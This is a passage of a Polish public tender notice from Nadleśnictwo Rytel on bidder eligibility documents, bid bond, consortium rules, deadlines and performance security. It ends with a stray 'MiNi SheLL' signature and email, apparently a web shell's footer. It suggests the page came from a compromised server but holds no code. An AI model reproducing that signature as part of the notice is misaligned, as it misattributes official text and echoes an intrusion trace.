podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu, o których mowa<br/>w pkt 7.1. Zamawiający przed udzieleniem zamówienia, działając na podstawie art. 274<br/>ust. 1 PZP wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia<br/>następujących podmiotowych środków dowodowych:<br/>a) wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub<br/>ciągłych również wykonywanych, w okresie ostatnich 3 lat od dnia w którym upływa<br/>termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wraz z podaniem ich wartości brutto, przedmiotu (rodzaju wykonanych usług),<br/>dat wykonania (dat dziennych rozpoczęcia i zakończenia realizacji) i podmiotów, na<br/>rzecz których usługi zostały wykonane lub są wykonywane (sporządzone zgodne ze<br/>wzorem stanowiącym załącznik nr 8 do SWZ).<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług, wykonanych<br/>wspólnie z innymi Wykonawcami, wykaz dotyczy usług, w których wykonaniu<br/>Wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających<br/>się lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy.<br/>b) dowody określające, czy wskazane przez Wykonawcę usługi na potwierdzenie<br/>spełnienia warunku udziału w postępowaniu dot. zdolności technicznej lub zawodowej<br/>w zakresie doświadczenia zostały wykonane lub są wykonywane należycie.<br/>Dowodami, o których mowa powyżej są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń<br/>powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie<br/>Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal<br/>wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte<br/>wykonanie powinny być wystawione w okresie ostatnich 3 miesięcy liczonych wstecz<br/>od dnia w którym upływa termin składania ofert.<br/>c) informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej<br/>potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową<br/>Wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.<br/>Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć wymaganych przez<br/>Zamawiającego podmiotowych środków dowodowych, składa inne podmiotowe środki<br/>dowodowe, które w wystarczający sposób potwierdzają spełnianie opisanego przez<br/>Zamawiającego warunku udziału w postępowaniu lub kryterium selekcji dotyczącego<br/>sytuacji ekonomicznej lub finansowej.<br/>Dowodami, o których mowa powyżej są dokumenty wymienione w Obwieszczeniu<br/>Prezesa Rady Ministrów z dnia 13 stycznia 2021 r. w sprawie ogłoszenia jednolitego<br/>tekstu rozporządzenia Prezesa Rady Ministrów w sprawie sposobu przeprowadzania<br/>postępowania kwalifikacyjnego w służbie cywilnej lub oświadczenie Wykonawcy.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Jeżeli Wykonawca lub podmiot udostępniający zasoby na zasadach określonych w art.<br/>118 w zw. z art. 266 PZP, ma siedzibę lub miejsce zamieszkania poza terytorium<br/>Rzeczypospolitej Polskiej zamiast dokumentów: odpisu albo informacji z Krajowego<br/>Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej,<br/>o których mowa w pkt 8.3. lit b) – składa dokument lub dokumenty wystawione w kraju,w którym Wykonawca, lub podmiot trzeci ma siedzibę lub miejsce zamieszkania,<br/>potwierdzające, że: nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami<br/>nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność<br/>gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji<br/>wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej<br/>procedury.Jeżeli w kraju, w którym Wykonawca lub podmiot trzeci ma siedzibę lub miejsce<br/>zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 8.5., zastępuje się je<br/>odpowiednio w całości lub w części dokumentem zawierającym odpowiednio<br/>oświadczenie Wykonawcy lub podmiotu trzeciego, ze wskazaniem osoby albo osób<br/>uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał<br/>dotyczyć, złożone pod przysięgą, lub jeżeli w kraju, w którym Wykonawca ma siedzibę<br/>lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone<br/>przed organem sądowym lub administracyjnym, notariuszem, organem samorządu<br/>zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce<br/>zamieszkania Wykonawcy lub podmiotu trzeciego. Postanowienia pkt 8.6. stosuje się.<br/>8.8. Jeżeli złożone przez Wykonawcę oświadczenie, o którym mowa w art. 125 ust. 1 PZP,<br/>lub podmiotowe środki dowodowe budzą wątpliwości Zamawiającego, może on<br/>zwrócić się bezpośrednio do podmiotu, który jest w posiadaniu informacji lub<br/>dokumentów istotnych w tym zakresie dla oceny spełniania przez Wykonawcę<br/>warunków udziału w postępowaniu, kryteriów selekcji lub braku podstaw<br/>wykluczenia, o przedstawienie takich informacji lub dokumentów.<br/>8.9. Jeżeli w dokumentach złożonych na potwierdzenie spełnienia warunków udziału w<br/>postępowaniu jakiekolwiek wartości zostaną podane w walucie obcej to Zamawiający<br/>przeliczy wartość waluty na złote wedle średniego kursu NBP z dnia ukazania się<br/>ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium w wysokości określonej poniżej: <br/>	2 000,00 zł (słownie złotych: dwa tysiące 00/100).<br/>	Wadium należy wnieść przed upływem terminu składania ofert.<br/>10.2. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>	1) pieniądzu,<br/>	2) gwarancjach bankowych,<br/>	3) gwarancjach ubezpieczeniowych,<br/>	4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn.: Dz. U. z 2023 r. poz. 462.).<br/>10.3. Wadium wpłacane w pieniądzu należy wnieść przelewem na rachunek bankowy<br/>	Zamawiającego w banku BGŻ BNP Paribas O/Tuchola nr rachunku: <br/>	05 2030 0045 1110 0000 0076 2920 z dopiskiem: wadium –przetarg na obsługę Nadleśnictwa Rytel . <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>(konsorcjum):<br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia;<br/>2) oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca<br/>ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi wynikać<br/>z treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna<br/>dokładnie określać zakres umocowania;<br/>3) oświadczenie, o którym mowa w art. 125 ust. 1 PZP składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw<br/>wykluczenia oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim<br/>każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. Ww.<br/>oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>powinno zostać złożone wraz z ofertą pod rygorem nieważności, w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym;<br/>4) dokumenty, o których mowa w pkt 8.3. obowiązany będzie złożyć każdy z<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia 5) dokumenty, o których mowa w pkt 8.2. lit. a i c Wykonawcy wspólnie ubiegający się<br/>o zamówienie składają wspólnie, natomiast dokumenty, o których mowa w pkt 8.2. lit.<br/>b, d i e składa ten z Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>który wykazuje spełnienie warunku udziału w postępowaniu, do którego wykazania<br/>służy dany dokument;<br/>6) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić<br/>odpowiedzialność solidarną za wykonanie umowy;<br/>7) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród<br/>siebie Wykonawcę kierującego (lidera), upoważnionego do zaciągania zobowiązań,<br/>otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich<br/>partnerów;<br/>8) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy<br/>w całości przez lidera lub od wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia łącznie lub każdego z osobna;<br/>9) Zamawiający informuje o treści przepisu art. 117 ust. 3 PZP, zgodnie z którym w<br/>odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą<br/>polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji<br/>których te zdolności są wymagane. W związku z powyższym Wykonawca jest<br/>zobowiązany załączyć do oferty podmiotowy środek dowodowy w postaci<br/>oświadczenia, z którego wynika, które usługi wykonają poszczególni Wykonawcy. Wzór<br/>stosownego oświadczenia został zawarty w formularzu ofertowym stanowiącym<br/>załącznik nr 1 i Zamawiający zaleca złożyć to oświadczenie właśnie w tym formularzu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy w sprawie zamówienia publicznego zawiera wzór umowy stanowiący załącznik nr 10 do SWZ.<br/>Umowa zostanie zawarta na podstawie złożonej oferty Wykonawcy. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności w niej wymienionych z uwzględnieniem podanych we wzorze umowy warunków ich wprowadzenia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-21 08:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">platformazakupowa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-21 08:45</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający wymaga wniesienia zabezpieczenia należytego wykonania umowy przez Wykonawcę, którego oferta została uznana za najkorzystniejszą.<br/>Zabezpieczenie należytego wykonania umowy wynosić będzie 5% ceny całkowitej podanej w Ofercie.<br/>Zabezpieczenie może być wnoszone według wyboru Wykonawcy w jednej lub w kilku następujących formach:<br/>1) pieniądzu;<br/>2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy<br/>oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze<br/>zobowiązaniem pieniężnym;<br/>3) gwarancjach bankowych;<br/>4) gwarancjach ubezpieczeniowych<br/>5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>W przypadku wniesienia wadium w pieniądzu Wykonawca może wyrazić zgodę na zaliczenie kwoty wadium na poczet zabezpieczenia.<br/>Zabezpieczenie należytego wykonania umowy, we wszystkich formach przewidzianych w pkt 19.3., powinno zabezpieczać roszczenia wynikające z niewykonania bądź nienależytego wykonania umowy w taki sam sposób, co oznacza, iż zabezpieczenie wniesione w formie innej niż pieniądz nie może zabezpieczać roszczeń Zamawiającego w sposób mniej korzystny, niż jakby miało to miejsce w przypadku wniesienia zabezpieczenia w pieniądzu. Zabezpieczenie należytego wykonania umowy w formie gwarancji/poręczenia powinno być nieodwołalne, bezwarunkowe i płatne na pierwsze pisemne żądanie Zamawiającego. Zamawiający nie dopuszcza możliwości uzależnienia wypłaty kwot z gwarancji/poręczenia od przedłożenia jakichkolwiek dodatkowych dokumentów, bądź spełnienia jakichkolwiek warunków, poza oświadczeniem Zamawiającego, iż żądana kwota jest należna z tytułu niewykonania bądź nienależytego wykonania umowy.<br/> Zamawiający zwróci zabezpieczenie w terminie 30 dni od dnia wykonania zamówienia i uznania przez Zamawiającego za należycie wykonane.<br/>Przed zawarciem umowy w sprawie zamówienia publicznego, Wykonawca, którego oferta została uznana za najkorzystniejszą zobowiązany jest dopełnić następujących formalności:<br/>1) wnieść wymagane zabezpieczanie należytego wykonania umowy;<br/>2) przedłożyć Zamawiającemu:<br/>- umowę konsorcjum, jeżeli zamówienie będzie realizowane przez Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia;<br/>- kopię aktualnego orzeczenia lekarskiego o braku przeciwskazań przy wykonywaniu pracy w<br/>gastronomii;<br/>- polisę od odpowiedzialności cywilnej określoną we wzorze umowy w sprawie zamówienia<br/>publicznego (stanowiącej załącznik nr 10 do SWZ) w wysokości 50 000,00 zł, którego dotyczyć<br/>będzie zawierana z Wykonawcą umowa w sprawie zamówienia publicznego;<br/>- dokumenty wskazane we wzorze umowy (stanowiącej załącznik nr 10 do SWZ) dot. osób<br/>wykonujących czynności wchodzące w skład przedmiotu zamówienia polegające na<br/>przygotowywaniu i serwowaniu posiłków, jeżeli wykonanie tych czynności polega na<br/>wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. -<br/>Kodeks pracy (tekst jedn.: Dz. U. z 2023 r. poz. 1465 z późn. zm.).

Creat By MiNi SheLL
Email: jattceo@gmail.com